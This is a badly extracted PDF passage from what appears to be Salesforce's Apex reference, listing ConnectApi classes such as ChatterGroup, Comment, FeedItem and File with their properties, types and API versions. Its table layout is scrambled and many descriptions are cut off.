ConnectApi. Specifies the type of membership the user has with the group, such as group 28.0
GroupMembership owner, manager, or member.
Type Enum
GroupOwner
GroupManager
NotAMember
NotAMemberPrivateRequested
StandardMember
mySubscription ConnectApi.
Reference
If the context user is a member of this group, contains information about that 28.0
subscription; otherwise, returns null.
name
String
28.0
owner
ConnectApi.
UserSummary
28.0
photo
visibility
1007
28.0
Reference
ConnectApi.ChatterGroupDetail Class
Subclass of ConnectApi.ChatterGroup Class
Name
Type
Description
Available
Version
fileCount
Integer
28.0
information
ConnectApi. Describes the Information section of the group. In the Web UI, this section 28.0
is above the Description section. If the group is private, this section is
Group
Information visible only to members. If the context user is not a member of the group
or does not have Modify All Data or View All Data permission, this value
is null.
pending
Requests
Integer
29.0
ConnectApi.ChatterGroupPage Class
Name
Type
currentPageUrl String
Description
Available
Version
28.0
groups
28.0
nextPageUrl
String
Chatter REST API URL identifying the next page or null if there isnt a
next page.
28.0
previous
PageUrl
String
Chatter REST API URL identifying the previous page or null if there isnt 28.0
a previous page.
ConnectApi.ChatterGroupSummary Class
Subclass of ConnectApi.ChatterGroup Class
ConnectApi.ChatterGroupSummaryPage Class
Name
Type
currentPageUrl String
groups
Description
Available
Version
29.0
1008
29.0
Reference
Name
Type
Description
Available
Version
nextPageUrl
String
Chatter REST API URL identifying the next page or null if there 29.0
isnt a next page.
previousPageUrl String
Chatter REST API URL identifying the previous page or null if 29.0
there isnt a previous page.
ConnectApi.ChatterLike Class
Name
Type
Description
Available
Version
id
String
Likes 18-character ID
28.0
likedItem
ConnectApi.
Reference
28.0
url
String
28.0
user
ConnectApi.User
Summary
Likes creator
28.0
ConnectApi.ChatterLikePage Class
Name
Type
Description
Available
Version
currentPageToken Integer
28.0
currentPageUrl String
28.0
items
32.0
likes
28.031.0
nextPageToken
Integer
Token identifying the next page or null if there isnt a next page. 28.0
nextPageUrl
String
Chatter REST API URL identifying the next page or null if there 28.0
isnt a next page.
previousPageToken Integer
28.0
previousPageUrl String
28.0
28.0
total
Integer
1009
Reference
ConnectApi.ChatterLikesCapability Class
If a feed element has this capability, the context user can like it. Exposes information about existing likes.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
isLikedBy
CurrentUser
Boolean
32.0
page
ConnectApi.
ChatterLikePage
32.0
likesMessage
ConnectApi.
MessageBody
32.0
myLike
ConnectApi.
Reference
32.0
ConnectApi.ChatterMessage Class
Name
Type
Description
Available
Version
body
ConnectApi.MessageBody
29.0
conversationId String
29.0
conversationUrl String
29.0
29.0
id
String
recipients
sender
ConnectApi.UserSummary
sendingCommunity ConnectApi.Reference
29.0
29.0
32.0
Datetime
url
String
1010
29.0
Reference
ConnectApi.ChatterMessagePage Class
Name
Type
Description
Available
Version
currentPageToken String
29.0
currentPageUrl String
29.0
messages
29.0
nextPageToken
String
29.0
nextPageUrl
String
29.0
ConnectApi.ClientInfo Class
Name
Type
Description
Available
Version
applicationName String
28.0
applicationUrl String
Value from the Info URL field of the connected app used for
authentication
28.0
ConnectApi.Comment Class
Name
Type
Description
Available
Version
attachment
28.0
capabilities
ConnectApi.
Capabilities associated with the comment, such as any file
CommentCapabilities attachments.
32.0
clientInfo
ConnectApi.
ClientInfo
createdDate
Datetime
feedElement
ConnectApi.
Reference
1011
Reference
Name
Type
Description
Available
Version
feedItem
ConnectApi.
Reference
28.0-31.0
id
String
Comments 18character ID
isDelete
Restricted
Boolean
If this property is true, the context user cannot delete the 28.0
comment. If it is false, it might be possible for the context
user to delete the comment, but it is not guaranteed.
likes
ConnectApi.Chatter
LikePage
28.0
likesMessage
ConnectApi.Message
Body
28.0
moderation
Flags
ConnectApi.
ModerationFlags
29.0
myLike
ConnectApi.
Reference
If the context user has liked the comment, this property is a 28.0
reference to the specific like, null otherwise
parent
ConnectApi.
Reference
ConnectApi.Features.communityModeration
is false, this property is null.
28.0
relativeCreatedDate String
type
ConnectApi.
CommentType Enum
28.0
url
String
28.0
user
ConnectApi.User
Summary
28.0
ConnectApi.CommentCapabilities Class
A set of capabilities on a comment.
Property Name
Type
Description
content
ConnectApi.
If a feed element has this capability, it has a file
ContentCapability attachment.
1012
Available Version
32.0
Reference
ConnectApi.CommentPage Class
Name
Type
Description
Available
Version
comments
28.0-31.0
currentPageToken String
28.0
currentPageUrl String
28.0
items
32.0
nextPageToken
String
Token identifying the next page or null if there isnt a next page.
28.0
nextPageUrl
String
Chatter REST API URL identifying the next page or null if there isnt a 28.0
next page.
total
Integer
28.0
ConnectApi.CommentsCapability Class
If a feed element has this capability, the context user can add a comment to it.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
page
ConnectApi.
CommentPage
Class
32.0
ConnectApi.Community Class
Name
Type
allowChatter
Boolean
AccessWithoutLogin
Description
Available
Version
Specifies if guest users can access public groups in the community without 31.0
logging in.
allowMembers
ToFlag
Boolean
30.0
description
String
Community description
28.0
id
String
Community ID
28.0
28.0
invitationsEnabled Boolean
1013
Reference
Name
Type
Description
Available
Version
knowledgeable
Enabled
Boolean
name
String
Community name
28.0
nicknameDisplay Boolean
Enabled
32.0
privateMessages Boolean
Enabled
reputationEnabled Boolean
sendWelcomeEmail Boolean
siteUrl
String
status
Enum
28.0
Site URL for the community, which is the custom domain plus a URL prefix 30.0
28.0
Inactive
UnderConstruction
url
String
28.0
urlPathPrefix
String
28.0
ConnectApi.CommunityPage Class
Name
Type
Description
Available Version
communities
List<ConnectApi.
Community>
28.0
total
Integer
28.0
ConnectApi.ComplexSegment Class
This class is abstract.
Subclass of ConnectApi.MessageSegment Class
Superclass of ConnectApi.FieldChangeSegment Class
ComplexSegments are only part of field changes.
1014
Reference
Name
Type
Description
Available Version
segments
List<ConnectApi.
MessageSegment>
28.0
ConnectApi.CompoundRecordField Class
Subclass of ConnectApi.LabeledRecordField Class
A record field that is a composite of sub-fields.
Name
Type
Description
Available Version
fields
ConnectApi.ContentAttachment Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.ContentCapability is used.
Subclass of ConnectApi.FeedItemAttachment Class
Objects of this type are returned by attachments in feed items with the type ContentPost.
Name
Type
Description
Available Version
checkSum
String
28.031.0
contentUrl
String
URL for link files and Google Docs; otherwise the value is null.
31.031.0
description
String
28.031.0
downloadUrl
String
Files URL. This value is null if the content is a link or a Google Doc. 28.031.0
fileExtension
String
28.031.0
fileSize
String
28.031.0
fileType
String
Type of file
28.031.0
28.029.0
hasImagePreview Boolean
hasPdfPreview
Boolean
28.031.0
id
String
Contents 18-character ID
28.031.0
true if the file is included in the users Salesforce Files Sync folder,
and is synced between that folder and Chatter; false otherwise.
28.031.0
isInMyFileSync Boolean
mimeType
String
28.031.0
renditionUrl
String
28.031.0
1015
Reference
Name
Type
Description
renditionUrl
240By180
String
URL to the 240 x 180 rendition resource for the file.For shared files,
30.031.0
renditions process asynchronously after upload. For private files,
renditions process when the first file preview is requested, and arent
available immediately after the file is uploaded.
renditionUrl
720By480
String
URL to the 720 x 480 rendition resource for the file.For shared files,
30.031.0
renditions process asynchronously after upload. For private files,
renditions process when the first file preview is requested, and arent
available immediately after the file is uploaded.
textPreview
String
30.031.0
30.031.0
thumb120By90
String
RenditionStatus
Available Version
Specifies the rendering status of the 240 x 180 preview image of the
file. One of these values:
30.031.0
Specifies the rendering status of the 720 x 480 preview image of the
file. One of these values:
30.031.0
String
28.031.0
versionId
String
28.031.0
ConnectApi.ContentCapability
If a feed element has this capability, it has a file attachment.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
checksum
String
32.0
1016
Reference
Property Name
Type
Description
Available Version
contentUrl
String
32.0
description
String
32.0
downloadUrl
String
32.0
fileExtension
String
32.0
fileSize
String
fileType
String
Type of file.
hasPdfPreview
Boolean
32.0
otherwise.
id
String
32.0
isInMyFileSync
Boolean
32.0
String
32.0
renditionUrl
String
renditionUrl240By180 String
32.0
renditionUrl720By480 String
32.0
textPreview
String
thumb120By90
RenditionStatus
String
thumb240By180
RenditionStatus
String
thumb720By480
RenditionStatus
String
title
String
1017
32.0
Reference
Property Name
Type
Description
Available Version
versionId
String
32.0
ConnectApi.CurrencyRecordField Class
Subclass of ConnectApi.LabeledRecordField Class
A record field containing a currency value.
ConnectApi.DashboardComponentAttachment Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.DashboardComponent
SnapshotCapability is used.
Subclass of ConnectApi.FeedItemAttachment Class
Objects of this type are returned as attachments in feed items with type DashboardSnapshot.
Name
Type
Description
Available Version
componentId
String
Components 18character ID
28.031.0
componentName
String
28.031.0
dashboardBodyText String
Text displayed next to the actor in the body of a feed item. This is used 28.031.0
instead of the default body text. If no text is specified, and there is no
default body text, returns null.
dashboardId
String
Dashboards 18character ID
28.031.0
dashboardName
String
28.031.0
fullSizeImageUrl String
28.031.0
lastRefreshDate Datetime
28.031.0
lastRefreshDate String
DisplayText
The text of the last refresh date to be displayed, such as, Last refreshed 28.031.0
on October 31, 2011.
runningUser
28.031.0
thumbnailUrl
String
28.031.0
ConnectApi.DashboardComponentSnapshotCapability
If a feed element has this capability, it has a dashboard component snapshot. A snapshot is a static image of a dashboard component
at a specific point in time.
Subclass of ConnectApi.FeedElementCapability Class.
1018
Reference
Property Name
Type
dashboardComponent ConnectApi.
DashboardComponent
Snapshot
Description
Available Version
32.0
Snapshot
ConnectApi.DashboardComponentSnapshot
Represents both dashboard component snapshots and alerts you receive when a dashboard component value crosses a threshold.
Property Name
Type
Description
Available Version
componentId
String
32.0
componentName
String
32.0
32.0
dashboardBodyText String
dashboardId
String
32.0
dashboardName
String
32.0
32.0
32.0
fullSizeImageUrl String
lastRefreshDate
Datetime
lastRefresh
DateDisplayText
String
Display text for the last refresh date, for example, Last 32.0
Refreshed on October 31, 2013.
runningUser
ConnectApi.
UserSummary
thumbnailUrl
String
ConnectApi.DatacloudCompany Class
Information about a Data.com company.
All company information is visible for companies that you purchased and own. If you havent purchased a company, some of the fields
are hidden. Hidden fields are fully or partially hidden by asterisks ***.
Property Name
Type
activeContacts Integer
Description
Available Version
32.0
1019
Reference
Property Name
Type
Description
Available Version
address
ConnectApi.Address
annualRevenue
Double
companyId
String
description
String
dunsNumber
String
industry
String
isInactive
Boolean
isOwned
Boolean
32.0
32.0
String
naicsDescription String
name
String
numberOfEmployees Integer
ownership
String
32.0
32.0
1020
32.0
Reference
Property Name
Type
Description
Available Version
phoneNumbers
ConnectApi.PhoneNumber
sic
String
sicDescription String
site
String
32.0
32.0
String
tradeStyle
String
updatedDate
Datetime
website
String
yearStarted
String
32.0
32.0
ConnectApi.DatacloudCompanies Class
Lists all companies that were purchased in a specific order, page URLs, and the number of companies in the order.
Property Name
Type
Description
Available
Version
companies
ConnectApi.DatacloudCompany
32.0
currentPageUrl
String
1021
Reference
Property Name
Type
Description
Available
Version
nextPageUrl
String
previousPageUrl
String
total
Integer
ConnectApi.DatacloudContact Class
Information about a Data.com contact.
All contact information is visible for contacts that you purchased. If you have not purchased a contact, some of the fields will be hidden.
Hidden fields are fully or partially hidden by asterisks ***.
Property Name
Type
Description
Available Version
address
ConnectApi.Address
32.0
companyId
String
companyName
String
contactId
String
department
String
32.0
Engineering
IT
Marketing
Sales
email
String
32.0
firstName
String
32.0
1022
Reference
Property Name
Type
Description
Available Version
isInactive
Boolean
32.0
isOwned
Boolean
32.0
lastName
String
32.0
level
String
phoneNumbers
32.0
title
String
updatedDate
Datetime
ConnectApi.DatacloudContacts Class
Lists all contacts that were purchased in the specific order, page URLs, and the number of contacts in the order.
Property Name
Type
Description
Available Version
contacts
List
32.0
currentPageUrl
String
32.0
nextPageUrl
String
previousPageUrl
String
32.0
total
Integer
32.0
ConnectApi.DatacloudOrder Class
Returns the orderId, purchase date, purchase count, and URLs to details about your order.
1023
Reference
Property Name
Type
Description
Available Version
entityUrl
String
32.0
id
String
32.0
purchaseCount
Integer
32.0
purchaseDate
Datetime
32.0
url
String
32.0
ConnectApi.DatacloudPurchaseUsage Class
Information about Data.com point usage for Monthly Users and List Pool Users.
Property Name
Type
Description
Available Version
listpoolCreditsAvailable
Integer
listpoolCreditsUsed
Integer
monthlyCreditsAvailable
Integer
monthlyCreditsUsed
Integer
ConnectApi.DateRecordField Class
Subclass of ConnectApi.LabeledRecordField Class
A record field containing a date.
Name
Type
Description
Available Version
dateValue
Datetime
29.0
ConnectApi.EmailAddress Class
An email address.
1024
Reference
Name
Type
Description
Available Version
displayName
String
29.0
emailAddress
String
29.0
ConnectApi.EmailMessage Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.EmailMessageCapability is
used.
Subclass of ConnectApi.FeedItemAttachment Class
An email message from a case.
Name
Type
Description
Available
Version
direction
ConnectApi.Email
MessageDirection
29.031.0
Enum
emailMessageId String
29.031.0
subject
String
29.031.0
textBody
String
29.031.0
toAddresses
29.031.0
ConnectApi.EmailMessageCapability
If a feed element has this capability, it has an email message from a case.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
direction
ConnectApi.
The direction of the email message. Values are:
EmailMessageDirection InboundAn inbound message (sent by a
Available Version
32.0
customer).
OutboundAn outbound message (sent to a
customer by a support agent).
emailMessageId
String
32.0
subject
String
32.0
textBody
String
32.0
1025
Reference
Property Name
Type
Description
Available Version
toAddresses
List<ConnectApi.
EmailAddress>
32.0
ConnectApi.EnhancedLinkCapability
If a feed element has this capability, it has a link that may contain supplemental information like an icon, a title, and a description.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
description
String
32.0
icon
ConnectApi.Icon
A icon.
32.0
linkRecordId
String
linkUrl
String
title
String
32.0
ConnectApi.EntityLinkSegment Class
Subclass of ConnectApi.MessageSegment Class
Name
Type
Description
Available
Version
motif
ConnectApi.Motif
Class
A set of small, medium, and large icons that indicate whether 28.0
the entity is a file, group, record, or user. The motif can also
contain the objects base color.
reference
ConnectApi.
Reference
ConnectApi.EntityRecommendation Class
Represents a recommendation for a Salesforce entity, such as a file, group, record, or user.
Subclass of ConnectApi.AbstractRecommendation Class.
Property Name
Type
Description
Available Version
actOnUrl
String
32.0
1026
Reference
Property Name
Type
Description
Available Version
action
ConnectApi.
Recommendation
ActionType
32.0
entity
to take action.
ConnectApi.Features Class
Property
Type
Description
Available
Version
chatter
Boolean
28.0
chatterActivity Boolean
28.0
chatterAnswers Boolean
29.0
chatter
Boolean
GlobalInfluence
28.0
chatterGroup
Records
Boolean
30.0
chatterGroup
RecordSharing
Boolean
30.0
chatter
Messages
Boolean
28.0
chatterTopics
Boolean
28.0
communities
Enabled
Boolean
31.0
community
Moderation
Boolean
29.0
community
Reputation
Boolean
32.0
28.0
28.0
connectRecords Boolean
dashboard
Component
Snapshots
Boolean
1027
Reference
Property
Type
Description
Available
Version
default
Currency
IsoCode
String
28.0
feedPolling
Boolean
Indicates whether the is-modified resource is enabled for the Chatter API 28.0
files
Boolean
28.0
filesOnComments Boolean
28.0
groupsCanFollow Boolean
28.029.0
29.0
ideas
Boolean
managedTopics
Enabled
Boolean
Indicates access to the community home feed and the managed topic 32.0
feed.
mobile
Notifications
Enabled
Boolean
multiCurrency
Boolean
Indicates whether the users organization uses multiple currencies (true) 28.0
or not (false). When false, the defaultCurrencyIsoCode
indicates the ISO code of the default currency.
publisherActions Boolean
29.0
28.0
storeData
OnDevices
Enabled
Boolean
30.0
thanksAllowed
Boolean
28.0
28.0
28.0
Description
Available
Version
feedElementPostUrl String
Chatter REST API URL for posting feed elements to this subject.
31.0
feedElementsUrl String
31.0
28.031.0
trendingTopics Boolean
viralInvites
Allowed
Boolean
ConnectApi.Feed Class
Name
Type
feedItemsUrl
String
isModifedUrl
String
A Chatter REST API URL with a since request parameter that contains 28.0
an opaque token that describes when the feed was last modified. Returns
1028
Reference
Name
Type
Description
Available
Version
null if the feed isnt a news feed. Use this URL to poll a news feed for
updates.
ConnectApi.FeedBody Class
Subclass of ConnectApi.AbstractMessageBody Class
No additional properties.
ConnectApi.FeedDirectory Class
A directory of feeds and favorites.
Name
Type
Description
Available
Version
favorites
List<ConnectApi.Feed
Favorite>
30.0
feeds
30.0
ConnectApi.FeedDirectoryItem Class
The definition of a feed.
Name
Type
feedElementsUrl String
Description
Available
Version
feedItemsUrl
String
feedType
Enum
Chatter REST API resource URL for the feed items of a specific feed.
context user.
CompanyContains all feed items except feed items of type
TrackedChange. To see the feed item, the user must have sharing
access to its parent.
FilesContains all feed items that contain files posted by people
or groups that the context user follows.
FilterContains the news feed filtered to contain feed items
whose parent is a specified object type.
GroupsContains all feed items from all groups the context user
either owns or is a member of.
HomeContains all feed items associated with any managed topic
in a community.
1029
30.031.0
Reference
Name
Type
Description
Available
Version
String
30.0
keyPrefix
String
A key prefix is the first three characters of a record ID, which specifies the 30.0
entity type.
For filter feeds, this value is the key prefix associated with the entity type
used to filter this feed. All feed items in this feed have a parent whose
entity type matches this key prefix value. For non-filter feeds, this value
is null.
label
String
ConnectApi.FeedElement Class
Feed elements are the top-level items that a feed contains. Feeds are feed element containers.
This class is abstract.
Superclass of:
ConnectApi.FeedItem Class
ConnectApi.GenericFeedElement Class
1030
30.0
Reference
Property Name
Type
Description
Available Version
body
ConnectApi.
FeedBody
22.0
capabilities
ConnectApi.
FeedElement
Capabilities
Class
31.0
createdDate
Datetime
31.0
feedElementType
ConnectApi.
FeedElementType
ConnectApi.
MessageBody
id
String
22.0
modifiedDate
Datetime
31.0
parent
ConnectApi.
ActorWithId
28.0
1031
Reference
Property Name
Type
Description
Available Version
relativeCreated
Date
Datetime
31.0
url
String
22.0
ConnectApi.FeedElementCapabilities Class
A container for all capabilities that can be included with a feed element.
Property Name
Type
Description
Available Version
approval
ConnectApi.
If a feed element has this capability, it includes
ApprovalCapability information about an approval.
Class
32.0
banner
ConnectApi.
If a feed element has this capability, it has a banner
BannerCapability motif and style.
Class
31.0
bookmarks
ConnectApi.
If a feed element has this capability, the current user 31.0
can bookmark it.
Bookmarks
Capability Class
bundle
ConnectApi.
If a feed element has this capability, it has a container 31.0
BundleCapability of feed elements called a bundle.
Class
canvas
32.0
caseComment
32.0
chatterLikes
ConnectApi.
If a feed element has this capability, the context user 31.0
can like it. Exposes information about existing likes.
ChatterLikes
Capability Class
comments
ConnectApi.
If a feed element has this capability, the context user 31.0
CommentsCapability can add a comment to it.
Class
content
ConnectApi.
If a feed element has this capability, it has a file
ContentCapability attachment.
32.0
dashboardComponent ConnectApi.
If a feed element has this capability, it has a
32.0
Snapshot
DashboardComponent dashboard component snapshot. A snapshot is a
SnapshotCapability static image of a dashboard component at a specific
point in time.
1032
Reference
Property Name
Type
Description
Available Version
emailMessage
ConnectApi.
EmailMessage
Capability
32.0
enhancedLink
ConnectApi.
EnhancedLink
Capability
link
ConnectApi.
LinkCapability
moderation
ConnectApi.
If a feed element has this capability, users in a
community can flag it for moderation.
Moderation
Capability Class
poll
ConnectApi.
PollCapability
Class
32.0
31.0
questionAndAnswers ConnectApi.
If a feed element has this capability, it has a question 31.0
QuestionAndAnswers and comments on the feed element are answers to
Capability Class the question.
recommendations
ConnectApi.
Recommendations
Capability
32.0
recordSnaphot
ConnectApi.
RecordSnapshot
Capability
topics
ConnectApi.
If a feed element has this capability, the context user 31.0
TopicsCapability can add topics to it. Topics help users organize and
discover conversations.
Class
trackedChanges
ConnectApi.
TrackedChanges
Capability
ConnectApi.FeedElementCapability Class
A feed element capability, which defines the characteristics of a feed element.
In API versions 30.0 and earlier, every feed item supported comments, likes, topics, and so on. In versions 31.0 and later, every feed item
(and feed element) can have a unique set of capabilities. If a capability property exists on a feed element, that capability is available, even
if the capability property doesnt have a value. For example, if the ChatterLikes capability property exists on a feed element (with
or without a value), the context user can like that feed element. If the capability property doesnt exist, it isnt possible to like that feed
element. A capability can also contain associated data. For example, the Moderation capability contains data about moderation
flags.
This class is abstract.
1033
Reference
ConnectApi.FeedElementPage Class
A paged collection of ConnectApi.FeedElement objects.
Property Name
Type
currentPageToken String
Description
Available Version
31.0
currentPageUrl
String
31.0
elements
List<ConnectApi.
31.0
FeedElement
Class>
isModifiedToken
String
isModifiedUrl
String
1034
Reference
Property Name
Type
Description
Available Version
String
31.0
nextPageUrl
String
31.0
updatesToken
String
31.0
ConnectApi.ChatterFeeds.getFeedElementsUpdatedSince
method.
updatesUrl
String
ConnectApi.FeedFavorite Class
Name
Type
Description
community
Available Version
28.0
favorite
createdBy
ConnectApi.User
Summary
Favorites creator
28.0
feedUrl
String
Chatter REST API URL identifying the feed item for this 28.0
favorite
id
String
Favorites 18character ID
28.0
lastViewDate
Datetime
28.0
name
String
Favorites name
28.0
searchText
String
target
type
ConnectApi.
An empty string or one of the following values:
FeedFavoriteType Enum ListView
28.0
Search
Topic
url
String
1035
28.0
Reference
Name
Type
Description
Available Version
user
ConnectApi.User
Summary
28.0
Description
Available Version
ConnectApi.FeedFavorites Class
Name
Type
favorites
28.0
total
Integer
28.0
ConnectApi.FeedItem Class
Subclass of ConnectApi.FeedElement Class as of 31.0.
Name
Type
Description
Available
Version
actor
ConnectApi.Actor
28.0
attachment
ConnectApi.FeedItem
Attachment
28.031.0
Boolean
28.0
clientInfo
ConnectApi.ClientInfo
28.0
comments
ConnectApi.CommentPage
28.031.0
property.
event
Boolean
isBookmarked
ByCurrentUser
Boolean
1036
28.031.0
Reference
Name
Type
Description
Available
Version
capabilities.bookmarks.isBookmarkedByCurrentUser
property.
isDelete
Restricted
Boolean
28.0
isLikedBy
CurrentUser
Boolean
28.031.0
property.
likes
ConnectApi.ChatterLike
Page
28.031.0
property.
likesMessage
ConnectApi.MessageBody
A message body the describes who likes the feed item. 28.031.0
Important: As of version 32.0, use the
inherited
capabilities.chatterLikes.likesMessage
property.
moderationFlags ConnectApi.
ModerationFlags
29.030.0
ConnectApi.Features.communityModeration
is false, this property is null.
property.
myLike
ConnectApi.Reference
property.
1037
Reference
Name
Type
Description
Available
Version
originalFeedItem ConnectApi.Reference
originalFeed
ItemActor
ConnectApi.Actor
photoUrl
String
preamble
ConnectApi.MessageBody
28.0
28.031.0
property.
type
ConnectApi.FeedItemType Specifies the type of feed item, such as a content post, 28.0
1038
Reference
Name
Type
Description
ApprovalPostFeed item with an approval
capability. Approvers can act on the feed item
parent.
AttachArticleEventFeed item
generated when an article is attached to a case
in Case Feed.
BasicTemplateFeedItemFeed item
with an enhanced link capability.
CallLogPostFeed item generated when a
call log is saved to a case in Case Feed.
CanvasPostFeed item generated by a
canvas app in the publisher or from Chatter REST
API or Chatter in Apex. The post itself is a link to a
canvas app.
CaseCommentPostFeed item generated
when a case comment is saved in Case Feed.
ChangeStatusPostFeed item generated
when the status of a case is changed in Case Feed.
ChatTranscriptionPostFeed item
generated in Case Feed when a Live Agent chat
transcript is saved to a case.
CollaborationGroupCreatedFeed
item generated when a new public group is
created. Contains a link to the new group.
CollaborationGroupUnarchivedDeprecated.
Feed item generated when an archived group is
activated.
ContentPostFeed item with a content
capability.
CreateRecordEventFeed item that
describes a record created in the publisher.
DashboardComponentAlertFeed item
with a dashboard alert.
DashboardComponentSnapshotFeed
item with a dashboard component snapshot
capability.
EmailMessageEventFeed item generated
when an email is sent from a case in Case Feed.
FacebookPostDeprecated. Feed item
generated when a Facebook post is created from
a case in Case Feed.
LinkPostFeed item with a link capability.
1039
Available
Version
Reference
Name
Type
Description
Available
Version
ConnectApi.FeedItem
VisibilityType
28.0
ConnectApi.FeedItemAttachment Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.FeedElementCapability Class
is used.
This class is abstract.
Subclasses:
ConnectApi.ApprovalAttachment Class
ConnectApi.BasicTemplateAttachment Class
ConnectApi.CanvasTemplateAttachment Class
ConnectApi.EmailMessage Class
1040
Reference
ConnectApi.CaseComment Class
ConnectApi.ContentAttachment Class
ConnectApi.DashboardComponentAttachment Class
ConnectApi.FeedPoll Class
ConnectApi.LinkAttachment Class
ConnectApi.RecordSnapshotAttachment Class
ConnectApi.TrackedChangeAttachment Class
Message segments in a feed item are typed as ConnectApi.MessageSegment. Feed item capabilities are typed as
ConnectApi.FeedItemCapability. Record fields are typed as ConnectApi.AbstractRecordField. These classes
are all abstract and have several concrete subclasses. At runtime you can use instanceof to check the concrete types of these objects
and then safely proceed with the corresponding downcast. When you downcast, you must have a default case that handles unknown
subclasses.
Important: The composition of a feed may change between releases. Your code should always be prepared to handle instances
of unknown subclasses.
ConnectApi.FeedItemPage Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.FeedElementPage Class is used.
A paged collection of ConnectApi.FeedItem objects.
Name
Type
Description
Available
Version
currentPageToken String
28.031.0
currentPageUrl String
28.031.0
isModifiedToken String
isModifiedUrl
String
items
nextPageToken
String
Token identifying the next page or null if there isnt a next 28.031.0
page.
nextPageUrl
String
Chatter REST API URL identifying the next page or null if 28.031.0
there isnt a next page.
updatesToken
String
updatesUrl
String
1041
28.031.0
Reference
Name
Type
Description
Available
Version
ConnectApi.FeedItemTopicPage Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.TopicsCapability Class is used.
Name
Type
canAssignTopics Boolean
Description
Available
Version
28.031.0
otherwise
topics
List<ConnectApi.
Topic>
List of topics
28.031.0
ConnectApi.FeedModifiedInfo Class
Name
Type
Description
Available
Version
isModified
Boolean
true if the news feed has been modified since the last time it was
polled; false otherwise. Returns null if the feed is not a news
28.0
feed.
isModifiedToken String
String
A Chatter REST API URL with a since request parameter that contains 28.0
an opaque token that describes when the feed was last modified.
Returns null if the feed isnt a news feed. Use this URL to poll a news
feed for updates.
nextPollUrl
ConnectApi.FeedPoll Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.PollCapability Class is used.
Subclass of ConnectApi.FeedItemAttachment Class
This object is returned as the attachment of ConnectApi.FeedItem objects where the type property is PollPost.
1042
Reference
Name
Type
choices
28.031.0
myChoiceId
String
ID of the poll choice that the current user has voted for in this poll.
Returns null if the current user hasnt voted.
28.031.0
28.031.0
totalVoteCount Integer
Description
Available Version
ConnectApi.FeedPollChoice Class
Name
Type
Description
Available Version
id
String
Poll choice ID
28.0
position
Integer
The location in the poll where this poll choice exists. The first poll
choice starts at 1.
28.0
text
String
28.0
voteCount
Integer
28.0
voteCountRatio Double
The ratio of total number of votes for this poll choice to all votes cast 28.0
in the poll. Multiply the ratio by 100 to get the percentage of votes
cast for this poll choice.
ConnectApi.FieldChangeSegment Class
Subclass of ConnectApi.ComplexSegment Class
No additional properties.
ConnectApi.FieldChangeNameSegment Class
Subclass of ConnectApi.MessageSegment Class
No additional properties.
ConnectApi.FieldChangeValueSegment Class
Subclass of ConnectApi.MessageSegment Class
Name
Type
Description
Available Version
valueType
ConnectApi.
FieldChange
ValueType Enum
28.0
1043
Reference
Name
Type
Description
Available Version
url
String
ConnectApi.File Class
This class is abstract.
Subclass of ConnectApi.ActorWithId Class
Superclass of ConnectApi.FileSummary Class
Name
Type
Description
Available Version
checksum
String
28.0
content
ModifiedDate
Datetime
contentSize
Integer
contentUrl
String
If the file is a link, returns the URL, otherwise, the string null 28.0
description
String
28.0
downloadUrl
String
URL to the file, that can be used for downloading the file
28.0
fileExtension
String
28.0
fileType
String
28.0
flashRendition String
Status
28.0
isInMyFileSync Boolean
true if the file is included in the users Salesforce Files Sync 28.0
28.0
31.0
String
moderationFlags ConnectApi.
ModerationFlags
28.0
30.0
ConnectApi.Features.communityModeration
Datetime
28.0
name
String
28.0
1044
Reference
Name
Type
Description
Available Version
origin
String
28.0
ConnectApi.User
Summary
Files owner
pdfRendition
Status
String
Specifies if a PDF preview version of the file has been rendered 28.0
publishStatus
ConnectApi.
Specifies the publish status of the file.
FilePublishStatus PendingAccessFile is pending publishing.
Enum
28.0
28.0
PrivateAccessFile is private.
PublicAccessFile is public.
renditionUrl
String
renditionUrl
240By180
String
URL to the 240 x 180 rendition resource for the file.For shared 29.0
files, renditions process asynchronously after upload. For
private files, renditions process when the first file preview is
requested, and arent available immediately after the file is
uploaded.
renditionUrl
720By480
String
URL to the 720 x 480 rendition resource for the file.For shared 29.0
files, renditions process asynchronously after upload. For
private files, renditions process when the first file preview is
requested, and arent available immediately after the file is
uploaded.
sharingRole
ConnectApi.
FileSharingType
Enum
28.0
28.0
textPreview
String
thumb120By90
String
RenditionStatus
30.0
1045
Reference
Name
Type
Description
Available Version
Specifies the rendering status of the 240 x 180 preview image 28.0
of the file. One of these values:
ProcessingImage is being rendered.
FailedRendering process failed.
SuccessRendering process was successful.
NaRendering is not available for this image.
thumb720By480 String
RenditionStatus
Specifies the rendering status of the 720 x 480 preview image 28.0
of the file. One of these values:
ProcessingImage is being rendered.
FailedRendering process failed.
SuccessRendering process was successful.
NaRendering is not available for this image.
title
String
28.0
versionNumber
String
28.0
ConnectApi.FileSummary Class
Subclass of ConnectApi.File Class
This class represents a summary description of a file.
ConnectApi.FollowerPage Class
Name
Type
currentPageUrl String
Description
Available Version
28.0
followers
nextPageUrl
String
Chatter REST API URL identifying the next page or null if 28.0
there isnt a next page.
previousPageUrl String
Chatter REST API URL identifying the previous page or null 28.0
if there isnt a previous page.
total
Integer
1046
28.0
28.0
Reference
ConnectApi.FollowingCounts Class
Name
Type
Description
Available Version
people
Integer
28.0
records
Integer
28.0
Integer
28.0
ConnectApi.FollowingPage Class
Name
Type
Description
Available Version
currentPageUrl String
28.0
following
List<ConnectApi.
Subscription>
List of subscriptions
28.0
nextPageUrl
String
28.0
previousPageUrl String
total
Integer
28.0
ConnectApi.GenericBundleCapability Class
If a feed element has this capability, the feed element has a group of other feed elements condensed into one feed element. This group
is called a bundle.
Subclass of ConnectApi.BundleCapability Class.
ConnectApi.GenericFeedElement Class
A concrete implementation of the abstract ConnectApi.FeedElement class.
